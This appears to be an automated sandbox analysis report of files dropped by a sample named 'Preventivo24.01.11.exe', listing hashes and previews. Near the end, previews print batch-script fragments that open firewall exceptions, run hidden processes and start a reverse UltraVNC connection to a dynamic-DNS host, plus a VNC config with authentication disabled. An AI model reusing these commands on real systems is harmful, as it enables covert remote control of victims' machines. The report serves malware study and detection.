                      SSDEEP:384:UizhlhQhNhnhehvh2hdh7hGhEsfs5OsEsvXwXM626yYVYJtctftX1/iU+UApKGTE:U+nO/VMdkf98CQEO5cgcPBkcq9fadTEH
                      MD5:A7551F2B29E55D63E5FAEC1206F8E4FF
                      SHA1:AE380EE3FA3F901C467A87628710FCCC284D4872
                      SHA-256:67CCE11B371C99F701BB1CF0FE2943679654E5E31D3DED06ED434D035942A7C9
                      SHA-512:D030EA6C081B444077179227D99A1B542709C76F6349F963DD07295D35149DE6F6F6EDB4B5540ED6B8D1A79158CF2DF7216A856840F0E43E525C13C6F2F290AD
                      Malicious:false
                      Preview:SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:588+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConf
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):29752
                      Entropy (8bit):5.386753438347909
                      Encrypted:false
                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rE:A
                      MD5:9C08E7565A5DBDC7E30CD9D99CE3E4CD
                      SHA1:6C3121CACB696B01F3DC5E092D5DDD6E6E6E836E
                      SHA-256:60587FB87F40B87E05784314CB938CB1D9543C4F2C6C603AEA23290279FCA4DA
                      SHA-512:0A7728328DC8E4CFF1C73E0878585364D4258F0B5A5D250C07FB4B524F95A475D6932A4D0699E64FD5108EAE7D304105AD936374C3E340167F3C0F021E39731A
                      Malicious:false
                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                      Category:dropped
                      Size (bytes):1407294
                      Entropy (8bit):7.97605879016224
                      Encrypted:false
                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                      Category:dropped
                      Size (bytes):1419751
                      Entropy (8bit):7.976496077007677
                      Encrypted:false
                      SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                      MD5:41034A6B023B6BB9C723DA146E190954
                      SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                      SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                      SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                      Category:dropped
                      Size (bytes):758601
                      Entropy (8bit):7.98639316555857
                      Encrypted:false
                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                      MD5:3A49135134665364308390AC398006F1
                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                      Malicious:false
                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                      Category:dropped
                      Size (bytes):386528
                      Entropy (8bit):7.9736851559892425
                      Encrypted:false
                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                      Malicious:false
                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5038592
                      Entropy (8bit):6.043058205786219
                      Encrypted:false
                      SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                      MD5:11F7419009AF2874C4B0E4505D185D79
                      SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                      SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                      SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PDF document, version 1.7, 1 pages
                      Category:dropped
                      Size (bytes):44763
                      Entropy (8bit):7.691836262046289
                      Encrypted:false
                      SSDEEP:768:9paAbg8/yZjn2K/Cgrf7F0kTRelSLcBzWAMMwsOt+yn9:9Lyp2oLTk4ItWAMMO9
                      MD5:E3B54910AAE9324A7D56E5B22044104E
                      SHA1:F93D54BC3E20316DD9B596D4EB0FE22BD9F1D4D8
                      SHA-256:01FA678A302763B83703F0449FC63309CF7677FC119D2755DEFAD6DEA9D25BCD
                      SHA-512:0549192D6C52053BA1F1C9AFB38B2243EA8BE119DD0FBDE3D15BCBA073911B59669BEEFDFD0C8AADFCEAE44A4AF2C7B09C76EE1EC88C0E13F5406283019FCB6A
                      Malicious:false
                      Preview:%PDF-1.7.%.....3 0 obj.<<./Type /XObject./Subtype /Image./Width 825./Height 540./BitsPerComponent 8./ColorSpace /DeviceRGB./Filter /DCTDecode./DecodeParms <<./Quality 80.>>./Length 5 0 R.>>.stream......C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........9.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....C...e...4...i........W........\T...........W.........2...}_.O.&..Q.9P\........W.........2...m_.O.&.,Q.9P\........W..............?...qF(.As....6...m_.O.&.........?...qF(.As....2...}_.O.&....
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):47744
                      Entropy (8bit):6.688410109072587
                      Encrypted:false
                      SSDEEP:768:523s2H65HQdvusvavk76GDN8YeGQEky64UyToJs+i:5VQV75NzHae
                      MD5:E818AB67C68E3EE621A8888FBBF2F266
                      SHA1:644D473097112A48338202A418911716AAC5B9D8
                      SHA-256:FF9D8F7FC2C3F5D0AFAF6F76E87D41FEEABF54FACBE26DC59661A78830F32972
                      SHA-512:B67F0A1AB49E57459AFA8FD4E4FFC18BC2A8B2D7803C34A952656113D175A145AB2C1ABDE25272442759EC148BE8A5A05D44A6CE89DD882329BA436534D53BE4
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.,.W.,.W.,''.-.W.,''.-.W.,''.-.W.,./.,.W.,.<.-.W.,.W.,.W.,.<.-.W.,g&.-.W.,g&.-.W.,g&.-.W.,Rich.W.,........PE..L....Z._...........!.....f...8.......=..............................................%.....@A........................ ...`.......................................h.......8...........................................................................text....d.......f.................. ..`.rdata...'.......(...j..............@..@.data...d...........................@....reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:Windows setup INFormation
                      Category:modified
                      Size (bytes):3890
                      Entropy (8bit):3.7119439709099047
                      Encrypted:false
                      SSDEEP:48:5oAqyb+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:jAIVANniNx
                      MD5:D3153DDC1A7EB32C396E59E0CD2ECA50
                      SHA1:285BC785A8E9D76BA652A841A4331A1F6DFE9431
                      SHA-256:F615C264E1A04A5A18C62C08CABB9EBE8F76D964B04A111169F76C9036F260DD
                      SHA-512:AAD64BD3A90C41E35667AA9C7B017F4FDCF0705BD2B70F105193390E3C727A2E410DBA9764BC5343220E9A2A0880B830C81AF4973DECE92AB64B90E1DC77DDC6
                      Malicious:false
                      Preview:..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...4.2...4.9.9.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.x.8.6.........[.S.t.a.n.d.a.r.d...N.T.x.8.6.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.1...
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8560
                      Entropy (8bit):7.2886183166813785
                      Encrypted:false
                      SSDEEP:192:N0xTS0+qInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwCNQw1e9:NeInYPLNaowNZvZyEPLwPws9
                      MD5:B2957E97DD342E0C0C5B58CB4DF951E6
                      SHA1:A21F84EB2217DA6AB5079BFEFADC29503A662F6E
                      SHA-256:1105E05993AB4EA8EFD6475FFEB82091BA61387E2D4F531AE5C6097E9BF530D3
                      SHA-512:093E1FC0C322DAD8C902D8B116B3D66EDA79C3A3B51A40358A202801E850728049D0702C1F03466E17A0F390EE6B79BBDA6B2B59D2151A28EA00054294BD6503
                      Malicious:false
                      Preview:0.!l..*.H........!]0.!Y...1.0...+......0.....+.....7......0...0...+.....7.......(..i.@..##6....201018150649Z0...+.....7.....0...0.......A.&r..{...(..R..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0....([....k.R.A.3..m..11..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... ....0DL....\MCT........=...ww..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ....0DL....\MCT........=...ww..0.... ...d.JZ..,.....v.d.J..i.l.6.`.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:Generic INItialization configuration [admin]
                      Category:dropped
                      Size (bytes):1208
                      Entropy (8bit):5.080950758931414
                      Encrypted:false
                      SSDEEP:24:fJhFXNTxYgMKM0USlAdo9g9iWFOWIaGEToIeXYMyd5Tgc8OjulnN:fJzr8gUUAdTZOW+ooBI9j0NOjS
                      MD5:C5F11F117A37314A4DDAE8D4BFCA23B7
                      SHA1:58D1DFE525248BF51847526388F8D68CD3E50EA6
                      SHA-256:200A7BF46C84F3F71DACC5ECE63E87B9BEF981325DC76462076923F574E12C1D
                      SHA-512:0E99FD926F0FAA0CC576C6FF509CF037FFB2596FD5CB3A8BC5B080ED7BECDF29526C5CCACD1B5EBE2E243E0ECFF8186F81A14F16D3FB3C0472F38A3F50897652
                      Malicious:false
                      Preview:[Permissions]..[admin]..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=No Plugin Detected..primary=1..secondary=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..InputsEnabled=1..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..EnableUnicodeInput=0..EnableWin8Helper=0..QuerySetting=2..QueryTimeout=10..QueryDisableTime=0..QueryAccept=0..LockSetting=0..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..AllowLoopback=1..AuthRequired=0..ConnectPriority=0..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..PortNumber=5900..HTTPPortNumber=5800..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QueryIfNoLogon=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=000000000000000000..passwd2=000000000000000000..[poll]..Turb
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1035
                      Entropy (8bit):5.154375767864971
                      Encrypted:false
                      SSDEEP:24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7z2GD:6oo7urwEiNUz26
                      MD5:B9B8C2AD3F16DD1EE7518B5B4ED165B1
                      SHA1:FC8D881BF7B13DF8E7BF31B6F811F53C44F8336D
                      SHA-256:C2AB7B8701BDC36198A8F01791C8A3479EF3E8BCC6CCD3BD8C2F60DD9672E8E1
                      SHA-512:8CF8E80D8A8DB779B40005D87EFDAB57042026C62D4182129FC247F091E0C51E854509F85575BF0418A97FCAE096AA093CFB9128CF411E1993486F07A3BD966B
                      Malicious:false
                      Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..set /p numc=<IDD.txt..type C:\Games\cmd.txt|cmd..start C:\Games\viewer.exe /HideWindow C:\Games\once.cmd .. ....:com ..for %%A in (C:\Games\cmmc.cmd) do if %%~zA gtr 7 start C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd..timeout /t
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1102
                      Entropy (8bit):5.375478540906423
                      Encrypted:false
                      SSDEEP:24:np9ZV2tXY7ur3C7TEPaV1k774kIwoNEGMoNha9d0aR/vA+ZyZB:5oo7urwEieG75aRQ+Zs
                      MD5:8AADF3A1016440B07F8F3152E5755A41
                      SHA1:9B6FC4D8890FE08F427928A6ACCEF39F592FB271
                      SHA-256:B3C509FC687793ED75F2792540EFBDAB88D65CA18570C28651DA737CAC6544B7
                      SHA-512:40DA5935BFD778559B1EC982B3C3B928766E288BC00BE3C8A85C41B9942E2E66CC19C5CCB4F1105AC5C2DEA3EE44FF9F421895CFBF6DBB6B58AB1226C4C0A1BF
                      Malicious:false
                      Preview:Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline | findstr /i %RUN_C%> NUL..if errorlevel 1 (..start C:\Games\taskhost.exe -autoreconnect ID:%numc% -connec
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1221
                      Entropy (8bit):5.351088398106411
                      Encrypted:false
                      SSDEEP:24:op9ZV2tXY7ur3C7TEPaV1k774kIg4P5W40aJfiyZr/vA+coq+Hoq+Hoq+e:coo7urwEi0LahVQ+cx+Hx+Hx+e
                      MD5:76147E456F8F392405B1FBAC4F315A30
                      SHA1:FC90A4B0428DF537ED3FEE1A1B2E25C3C2A07D5A
                      SHA-256:D69E739F18BD24DB5CFD451FB2BDAB32B4EFEEF41145B75CB89C7DC56641852D
                      SHA-512:470EE57AC19364CCF4CDD8019A168440822E3E2B2708A3C4B5A4C5C0A3090C1BFEC1248E6AB1B23F93B5434FED3C69210A2161A56747231C25972752493AFD7C
                      Malicious:false
                      Preview:SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline | findstr /i %RUN_C%> NUL..if errorlevel 1 (..start %temp%/~.pdf..) else (.. @echo not starting %RUN_C%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\taskhost.exe -multi -autoreconnect ID:%numc% -connect vnvariant2024.ddnsfree.com:5500 -run..start C:
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):253280
                      Entropy (8bit):6.610000632203147
                      Encrypted:false
                      SSDEEP:6144:vroB+yBBquE2s4MSp5Y1HKKfkXNoIij+bvNf4wmNJh/WLX:E+yhEBge1H0rij+RQwgh/Wz
                      MD5:1D34EBEE7F7B9966DC449388438E80D5
